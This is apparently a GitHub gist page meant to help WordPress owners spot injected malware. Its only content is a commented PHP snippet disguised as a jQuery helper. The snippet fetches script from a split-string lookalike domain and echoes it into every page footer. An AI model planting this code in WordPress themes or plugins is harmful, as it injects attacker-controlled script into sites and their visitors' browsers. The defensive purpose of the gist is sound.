Skip to content

Instantly share code, notes, and snippets.

@EastSideCode
Created May 8, 2018 19:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save EastSideCode/5783e09726769f8eb38488bdc0943ec1 to your computer and use it in GitHub Desktop.
Save EastSideCode/5783e09726769f8eb38488bdc0943ec1 to your computer and use it in GitHub Desktop.
Removing queries that hack WordPress
/*
Look for something like this
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
echo(wp_remote_retrieve_body(wp_remote_get($host.'ui'.'jquery.org/jquery-1.6.3.min.js')));
}
add_action('wp_footer', 'wp_func_jquery');
}
*/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment